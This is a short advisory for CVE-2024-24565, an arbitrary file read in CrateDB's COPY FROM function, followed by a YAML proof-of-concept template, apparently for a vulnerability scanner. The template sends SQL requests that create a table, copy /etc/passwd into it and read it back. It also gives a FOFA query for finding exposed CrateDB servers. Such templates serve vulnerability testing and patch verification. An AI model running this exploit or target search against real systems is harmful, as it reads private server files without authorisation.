CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage. This vulnerability is patched in 5.3.9, 5.4.8, 5.5.4, and 5.6.1.
fofa: title="CrateDB"
PoC代码[已公开]
id: CVE-2024-24565
info:
name: CrateDB数据库任意文件读取漏洞
author: zan8in
severity: high
verified: true
description: |-
CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage. This vulnerability is patched in 5.3.9, 5.4.8, 5.5.4, and 5.6.1.
fofa: title="CrateDB"
reference:
- https://mp.weixin.qq.com/s/43ciyt7QFR3k3kjdfxZ7kQ
- https://nvd.nist.gov/vuln/detail/CVE-2024-24565
tags: cve,cve2024,fileread
created: 2024/02/21
set:
tablename: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /_sql?types
headers:
Content-Type: application/json; charset=UTF-8
body: |
{"stmt":"CREATE TABLE {{tablename}}(info_leak STRING)"}
expression: response.status == 200
r1:
request:
method: POST
path: /_sql?types
headers:
Content-Type: application/json; charset=UTF-8
body: |
{"stmt":"COPY {{tablename}} FROM '/etc/passwd' with (format='csv', header=false)"}
expression: response.status == 200
r2:
request:
method: POST
path: /_sql?types
headers:
Content-Type: application/json; charset=UTF-8
body: |
{"stmt":"SELECT * FROM {{tablename}} limit 10"}
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() && r1() && r2()